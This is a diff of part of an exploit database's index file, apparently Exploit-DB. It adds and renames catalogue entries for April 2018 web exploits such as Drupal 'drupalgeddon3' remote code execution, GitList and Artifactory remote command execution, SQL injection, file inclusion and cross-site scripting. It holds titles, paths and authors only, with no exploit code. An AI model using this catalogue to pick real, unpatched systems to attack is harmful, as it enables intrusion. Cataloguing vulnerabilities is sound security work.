+44542,exploits/php/webapps/44542.txt,"Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)",2018-04-25,Blaklis,webapps,php,
 44531,exploits/java/webapps/44531.txt,"WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting",2018-04-24,"SEC Consult",webapps,java,
-44535,exploits/php/webapps/44535.txt,"Blog Master Pro v1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php,
-44536,exploits/php/webapps/44536.txt,"HRSALE The Ultimate HRM v1.0.2 - CSV Injection",2018-04-25,8bitsec,webapps,php,
-44537,exploits/php/webapps/44537.txt,"HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection",2018-04-25,8bitsec,webapps,php,
+44535,exploits/php/webapps/44535.txt,"Blog Master Pro 1.0 - CSV Injection",2018-04-25,8bitsec,webapps,php,
+44536,exploits/php/webapps/44536.txt,"HRSALE The Ultimate HRM 1.0.2 - CSV Injection",2018-04-25,8bitsec,webapps,php,
+44537,exploits/php/webapps/44537.txt,"HRSALE The Ultimate HRM 1.0.2 - 'award_id' SQL Injection",2018-04-25,8bitsec,webapps,php,
 44538,exploits/php/webapps/44538.txt,"HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross-Site Scripting",2018-04-25,8bitsec,webapps,php,
-44539,exploits/php/webapps/44539.txt,"HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion",2018-04-25,8bitsec,webapps,php,
+44539,exploits/php/webapps/44539.txt,"HRSALE The Ultimate HRM 1.0.2 - Local File Inclusion",2018-04-25,8bitsec,webapps,php,
+44543,exploits/linux/webapps/44543.txt,"Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution",2018-04-26,"Alessio Sergi",webapps,linux,
+44544,exploits/php/webapps/44544.php,"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion",2018-04-26,Wadeek,webapps,php,
+44545,exploits/linux/webapps/44545.py,"SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response",2018-04-26,"Sven Fassbender",webapps,linux,
+44546,exploits/php/webapps/44546.txt,"October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting",2018-04-26,0xB9,webapps,php,
+44547,exploits/php/webapps/44547.txt,"MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting",2018-04-26,0xB9,webapps,php,80
+44548,exploits/php/webapps/44548.py,"GitList 0.6 - Unauthenticated Remote Code Execution",2018-04-26,"Kacper Szurek",webapps,php,
+44550,exploits/hardware/webapps/44550.txt,"TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot",2018-04-26,Wadeek,webapps,hardware,
+44551,exploits/php/webapps/44551.txt,"Frog CMS 0.9.5 - Persistent Cross-Site Scripting",2018-04-26,"Wenming Jiang",webapps,php,80